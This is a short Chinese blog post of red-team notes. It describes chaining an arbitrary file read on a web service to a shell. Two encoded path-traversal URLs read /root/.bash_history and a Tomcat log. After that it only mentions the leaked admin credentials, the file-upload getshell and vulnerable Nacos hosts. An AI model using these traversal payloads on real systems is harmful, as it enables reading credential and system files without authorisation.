记一次某系统任意文件读取到getshell攻防笔记

avatar

云烟
百度一下
关键词:云烟博客
点击搜索,可帮助本站seo优化!
随便看看
2024 年 06 月 16 日
SQL注入(三)SQL server和Oracle注入
2023 年 08 月 30 日
安卓搭建php环境-Termux
2023 年 03 月 27 日
utf8和utf8mb4的区别
首页
/ 正文

摘要由 AI 智能生成

IP:1880/%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2froot%2F.bash_history

读取历史命令 发现频繁查看日志文件

mcyjl60t.png

IP:1880/%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fusr%2Flocal%2Ftomcat%2Fapache-tomcat-8.5.78%2Flogs%2Fcatalina.out

mcyjlfhf.png

下载到本地查看 搜索到管理员账号密码

mcyjq74w.png

大量敏感数据

mcyjqnxn.png

后台存在任意文件上传

mcyjqwz9.png

Getshell

mcyjr40v.png

进内网常规打法 发现几个nacos存在历史漏洞,配置信息里大量数据库。。

攻防笔记
版权属于:云烟
本文链接:https://www.yunyanck.cn/index.php/archives/118/
作品采用 知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议 进行许可
免费好用多功能代理池-JackProxy
« 上一篇
vulntarget-k打靶笔记
下一篇 »
评论区
头像